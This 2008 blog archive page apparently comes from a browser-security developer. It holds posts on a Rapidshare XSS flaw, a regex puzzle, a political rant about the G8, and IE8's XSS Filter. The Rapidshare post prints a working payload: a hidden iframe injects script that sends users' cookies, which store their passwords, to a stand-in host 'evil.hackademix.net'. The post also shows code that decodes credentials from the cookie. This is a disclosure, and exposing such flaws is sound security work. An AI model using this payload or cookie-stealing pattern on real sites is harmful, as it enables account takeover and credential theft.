Archive for July, 2008

You know, looks like the Firefox Summit 2008 is going to have a dramatic epilogue.
I've been sitting next to AdBlock Plus' author all this afternoon, attending a couple of security-related sessions, and now I'm getting dangerously hungry...
Want to save your favourite adblocker? Try to file a bug depending on this one.

As nktpro graciously told us, the latest of several XSS vulnerabilities affecting Rapidshare is still unpatched, one month after it had been reported to the site owners.
But what can you expect by people who stores both your username and password inside your cookie?
Yes, check it by yourself: a Rapidshare cookie is something like

user=12345-%36%37%38%39%30

.
In Javascript,

cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))

Therefore, for a given cookie, access credentials are just

var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);

This means that if I embed the following code on this blog post, or even better on the FlashGot homepage, visited by thousands of Rapidshare users, I own an insane lot of accounts in a blink:

var injection = "<script>(" + (function() {
new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +
escape(document.cookie);
}) + ")()</scr" + "ipt>"
var iframe = document.body.appendChild(document.createElement("iframe"));
iframe.style.visibility = "hidden";
iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +
encodeURIComponent(injection);

But luckily, no Rapidshare user would ever visit those shady p0rn/w4r3z sites... ;)

Update

Fixed on 6 Aug 2008.

OK, Dustin Diaz (via Paul O’Shannessy) managed to delay my lunch by 30 secs.

var arr = ['a', 'b', 'c', 'c', 'd','e', 'e',
'e', 'e', 'e', 'f', 'e', 'f', 'e',
'f', 'a', 'a', 'a', 'f', 'f', 'f'];
var solution='a b c c d e e <span>e e e</span> f e f e f a a <span>a</span> f f <span>f</span>';
var won = arr.join(' ').replace(/((\w)\s\2\s)((?:\2\s?)+)(?=\s|$)/g, '$1<span>$3</span>') == solution;

Thanks to the wonderful interactive environment of Firefox's "Error Console" (formerly known as JavaScript Console), my pasta didn't get too cold :)

So the Hokkaido G8 has food security, climate changes and oil prices in a prominent place of its agenda.

Bush has made accountability a major theme for this year's G8 meetings, arguing that "we need people who not only make promises, but write checks, for the sake of human rights and human dignity, and for the sake of peace." The G8 includes Britain, Canada, France, Germany, Italy, Japan, Russia and the United States.

G8 leaders are expected to address an array of political, security and economic issues when they meet for three days. "We expect that they will discuss a broad range of issues, including development, Africa, food security, trade and investment policy, energy security, climate change and issues relating to the global economy, including oil prices.

Obviously, we expect the very same people who became insanely rich thanks to these "issues" 1 to clean up their profitable mess and save the world.

We expect politicians whose career and position is entirely built upon terror to fight it.
We expect governments driven by ruthless corporate interests to regulate for a planet-sustainable economy, which may require profit margin reductions or even degrowth 2.
We expect oil companies, mercenary armies, reconstruction contractors and weapon manufacturers, which rather than bribing the elected people representatives like they used to do in the past, nowadays have their executives directly placed in key government roles as an obscene parody of democracy, to shoot themselves in their feet.

Just like expecting anti-virus vendors to push technologies and approaches making our information systems really safer, or Microsoft to promote open (web) standards...

Notes

[1] An interesting and very well documented paper titled Who benefits from GM crops: the rise in pesticide use explains clearly how technologies advertised as a remedy against world hunger are, in reality, making the problem far worse.

[2] The linked article is the first Google Search result in English for "Degrowth", and likely a good introductory resource. While both Italian and French Wikipedia sites have articles about this topic, I could not find anything on the English site. Why?

I'm happy to learn that IE8 is going to implement a less ambitious version of a feature which NoScript users have enjoyed for more than one year now. The announcement posts seem not to notice the resemblances of "XSS Filter" with NoScript's Anti-XSS Protection, the most striking being their non-blocking approach: loading the target page in a "neutralized" form and emitting a warning as an info-bar, which doesn't require interaction and therefore doesn't necessarily interrupt user's workflow. But that's fine: in facts, under the hood, their filter looks quite less sophisticated than NoScript's InjectionChecker engine, as it is based on a limited blacklist, apparently targeted to the most common reflective XSS attack patterns as seen in proofs of concept:


The XSS Filter defends against the most common XSS attacks but it is not, and will never be, an XSS panacea. [...]
The fact that our filter effectively blocks the common "><script>"… pattern we see most frequently in Type-1 XSS attacks is inherently a step forward. Pushing that further and blocking other common cases of reflected XSS where possible, as the XSS Filter does, is extra goodness.
Caveats aside, it will be great to see the tens of thousands of publicly disclosed Type-1 XSS vulnerabilities indexed on sites like XSSed.com simply stop working in IE8.

And there I started smiling: you realize, guys, that those listed "on sites like XSSed.com" are not "XSS vulnerabilities" which will "stop working in IE8", but just minimal exploit test cases --

<script>alert("XSS")<script>

-- which can be refactored and obfuscated in endless ways to obtain the "IE8 compatible" certification. Yeah, it will be great to see.

Anyway, such a feature being deployed as a built in of a popular browser, rather than as an add-on for an awesome browser, will likely keep script kiddies busy for a while, maybe taking a filter evasion crash course. I just hope it won't give some site owners an alibi not to fix their bugs, though, putting a "This site is best viewed with IE8" badge near to their McAfee Hackersafe logo.

Final thought: echoing the news on his blog, RSnake did swiftly mention NoScript (thanks), but at the end of that post, calling for adoption of his own bright Content Restrictions idea, he forgot to say that one (experimental) implementation already exists... Do these cross-site scripting filters suppress legitimate cross-site references as well? ;)

Bad Behavior has blocked 786 access attempts in the last 7 days.